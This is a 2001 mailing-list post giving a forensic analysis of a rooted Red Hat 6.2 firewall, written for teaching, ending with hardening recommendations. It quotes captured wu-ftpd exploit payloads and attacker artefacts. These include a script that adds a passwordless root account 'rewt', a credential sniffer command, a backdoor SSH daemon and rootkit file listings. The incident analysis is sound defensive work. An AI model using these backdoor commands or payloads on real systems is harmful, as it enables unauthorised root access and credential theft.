From: Curt Wilson (netw3@NETW3.COM)
Date: Sun Feb 04 2001 - 00:56:45 CST

Curt Wilson, Netw3 Consulting 02/02/2001

This is my first analysis of a Linux box that has been
rooted. This is intended to be somewhat of a teaching
document, and does not assume a large degree of
technical skill. If anyone sees any errors in here or
has any comments, I'd be happy to hear from you at
netw3@netw3.com

The box in question is an unpatched Red Hat Linux
6.2 machine running as an ipchains firewall and IP
masquerade server.

The attacker(s) main goal in system compromise
seems to be for the purpose of setting up a BNC
server that will allow connections to IRC networks
and an IRC bot. Attacker also used the compromised
linux system to search for other vulnerable systems
running the Washington University FTP through the
use of two exploits (wu-scan and muje) as well as
the attempted or actual exploits of numerous remote
systems through the statdx exploit. The statd exploit
attacks the remote procedure call application
rpc.statd and opens up an interactive root shell on
TCP port 39168. (For more info on statdx, see paper
by George Bakos at
http://www.sans.org/y2k/practical/George_Bakos.html
.)

Intruder erased log directory /var/log which damaged
numerous symlinks. A more careful attacker would
have left this directory intact but edited the specific
log files to erase their tracks. It is clear from system
analysis that this person is what’s known as a “script
kiddie” and does not represent an advanced attacker.

Intruder appears to have penetrated the system using
an exploit that attacks WU-FTP. The default wu-ftp on
Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable
and exploit code has been published on the Internet
and has been in wide use amongst the cracker
underground. Patches are available on the redhat
website.

Buffer overflow attacks on wu-ftp take place through
a specially crafted password sequence that includes
the spawning of /bin/sh. The IP addresses are most
likely other compromised systems that the attackers
are using to break into other sites and could be one of
the sites that was used to crack this box. Logs of
attacks in progress:

211.72.123.250 => external_ip_of_linux_system [21]
LeLmNnNnUSER ftp
NBnPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

151.15.186.199 => external_ip_of_linux_system [21]
Xv+R6-6-
user ftp]-1pass 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a-
3-a-aSITE EXEC %x %x %x %x +%x |%x

156.111.178.186 => external_ip_of_linux_system [21]
EEUSER ftp
QPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

syr-24-95-165-70.twcny.rr.com =>
external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

211.250.5.4 => external_ip_of_linux_system [21]
FFUSER ftp
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

63.105.115.4 => external_ip_of_linux_system [21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

The wu-ftp exploit probably allowed the attacker to
bind /bin/sh with a TCP port. The attacker then
telnets to the port and has interactive root access.
Another method is that the exploit allows the
execution of arbitrary code such as appending a
username into the /etc/passwd and /etc/shadow files
that is then used through the telnet port. Without
detailed logs, it’s hard to know exactly what the
attacker did since they cleaned up some other
commonly exploited services when they first logged
in to the system. It’s possible that the attacker gained
some other means of initial access but evidence
suggests that these FTP exploits were the means. A
Red Hat announcement about this problem can be
found at http://www.redhat.com/support/errata/RHSA-
2000-039.html

At some point, this attacker (or other attackers)
placed a file in /bin/psr which adds a user
named “rewt” with root level access and a user
named “mujixi” to the /etc/passwd and /etc/shadow
files:

echo "rewt:x:0:0:root user,,,:/root:/bin/bash"
>>/etc/passwd
echo "mujixi:x:666:666:ala care da
muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow

After obtaining root access, attacker modified multiple
system files and scripts to cover their tracks:

/etc/rc.d/rc.sysinit has been modified to run the
following:

        /usr/sbin/sshd2
        /usr/sbin/gpm.root
        /usr/sbin/gpm.root

/usr/sbin/gpm.root appears to be controlled by a
config file /etc/gpm-root.conf and contains the
following commands:

cd /usr/X11R6/include/X11/…

This directory is invisible to the standard ls
command, but will show up with an ls –a to display
all files. This is a common attacker trick. Most of
attackers tools were placed in this directory.

./linsniffer > tcp.log &

linsniffer captures login and passwords in an
Ethernet environment. A switched network makes
this attack more
difficult

/usr/sbin/sshd2 –p 1983

Attacker runs an SSH server on port 1983.

After exploiting the system for root access, the
attacker appeared to add a username “muje1” to
the /etc/passwd and/or /etc/shadow files with a group
ID of 501. Attacker also edited the /etc/ftpusers file,
perhaps allowing more users to login through FTP
than the original setting. Other suspicious user id’s
include “muje” and group ID’s include 1018 and 1004.

Next, attacker kills all instances of the lpd process.
This is probably so others won’t exploit “his” system
through an lpd buffer overflow (never mind that lpd
was not an open port from the outside, attacker
wanted to secure his own access). Attacker also
removed the portmapper startup file
in /etc/rc.d/init.d/portmap which stopped the
portmapper from listening on TCP port 111 (never
mind that portmapper was not an open port from the
outside). Attacker then cleans up by
running “updatedb” and removing a package named
srk.tar.gz (which might be a rootkit), and removing
the home directories of users muje and muje1.

The user appears to have replaced various system
binaries such as netstat, ps, ifconfig, and top to cover
their tracks. The replaced version of ps does not
show activity such as the linsniffer, and the replaced
version of ifconfig does now show the interface
running in promiscuous mode. The other replaced
binaries are most likely tailored to hide the attackers
activities from administrators eyes. These
replacements may have been done with srk.tar.gz. I
was unable to find a published tool named “srk” but
the “rk” suggests a rootkit. Please see
http://packetstorm.securify.com/UNIX/penetration/root
kits/ for a large selection of rootkits.

The group ID 1018 appears to have ran the rootkit.
The system binaries that were replaced by this
activity are as follows:

-rwxr-xr-x 1 1018 users 19840 Nov 25
1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27
1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan 2
1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan 12
1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec 19
10:14 /bin/vobiscu (unfamiliar)

The group ID 1004 created the following files of
interest:

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13
21:01 /dev/caca

[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666

31337 is commonly used in the computer
underground. Many Trojan horse applications listen
on port 31337. It is a variation of the word “elite”. 666
is used by attackers, and port 6666 may refer to an
IRC or BNC server.

-rw-rw-r-- 1 root 501 97 Jan 13
21:01 /dev/dsx

[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker
has installed.

-rw-rw-r-- 1 root 501 12288 Jan 13
21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root 501 4096 Jan 24 00:17 .
drwxr-x--- 8 root root 4096 Feb 2 18:54 ..
-rw------- 1 root root 663 Jan 28 20:41
known_hosts
-rw------- 1 root 501 512 Jan 28 20:41
random_seed

-rw-r--r-- 1 1004 users 307 Aug 31
1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13
21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13
21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb 3
04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27
1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by attacker(s) to store
SSH key and configuration files.

The following ports are open and listening on the local
(192.168) interface of the system:

21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker

The primary user that ran the BNC server appears to
go by the name of “bulangia” or “buLaneL”
or “bulanel” and a secondary user goes by the name
of “NINA16”. There is evidence of multiple
connections to Bulgaria and Italian IRC networks and
remote systems. Some of the hosts that used the
BNC server include 5dial86.xnet.ro and
11dial217.xnet.ro. Various IRC servers were visited
by these users, and if further action was warranted,
investigations could take place by connecting to the
same IRC networks and attempting to track these
people down.

Attacker(s) also installed what appears to be an IRC
bot going by the name of “eddy” or “eddybot”. The
software package used to implement this bot was
called emech-2.8 and the config file for e-mech
reveals details such as an ircname of “H-a-c-k T-h-e
F-u-c-k-i-n-g P-l-a-n-e-t !” and channels such
as “#Linux_mafia”. The linkpass and entityname are
present in the config and users file, which could allow
counterintelligence to be performed if desired.

Recommendations:

Apply patches to Red Hat systems running ipchains
firewalls. Red Hat 6.2 has nearly 50 security patches.
See http://www.redhat.com/support/errata/rh62-
errata-security.html.

Several accounts and passwords were obtained
through the user of the linsniffer application. A
switched environment can help reduce the risk of
sniffing attacks.

Lock down systems to provide “defense in depth”. Do
not simply rely upon ipchains to block hostile traffic.
Deny all traffic except what is specifically allowed.
Comment out services in /etc/services that do not
need to be ran (finger, etc) as well as in /etc/rc.d. If
the FTP service will be used, make sure
that /etc/ftpusers only allows specific usernames. If
attacker pierces firewall mechanism, limit what is
available by turning off everything that is not needed,
leaving only those services that are truly necessary.

Portsentry, which is running on the system, is a nice
addition, but obviously did not help in this instance.
Since the wu-ftp vulnerabilities are widely known,
attacker would only have to find the existence of TCP
port 21 with a banner that identified itself as a
vulnerable version of wu-ftp. The use of TCP
wrappers and ipchains to restrict access to ftpd
would be helpful. Modify listening services banners to
reflect false information to confuse attackers and
automated exploit/scanning applications.

Systems management should never be performed
over an unencrypted connection such as telnet.
Install SSH on the server and on your client systems
and use it. This encrypts connections and makes it
much harder for an attacker to obtain your login
credentials.

An intrusion detection system such as snort
(www.snort.org) is inexpensive, easy to configure,
and in wide use. Snort can monitor a network and
alert a network manager (with the proper
configuration) via pager or email that an attack is
taking place. Tripwire is a file integrity monitor that
can be used to take a snapshot of certain key system
files ( such as ps, netstat, ifconfig, and many more).
When these key system files are changed, an alert
can be generated to notify that something suspicious
is taking place. There are freeware/GPL options for
SSH (openSSH) and a freeware tripwire clone
available on the Internet (see www.whitehats.com for
a large collection of open source security tools).

Curt Wilson - Netw3 Consulting
netw3@netw3.com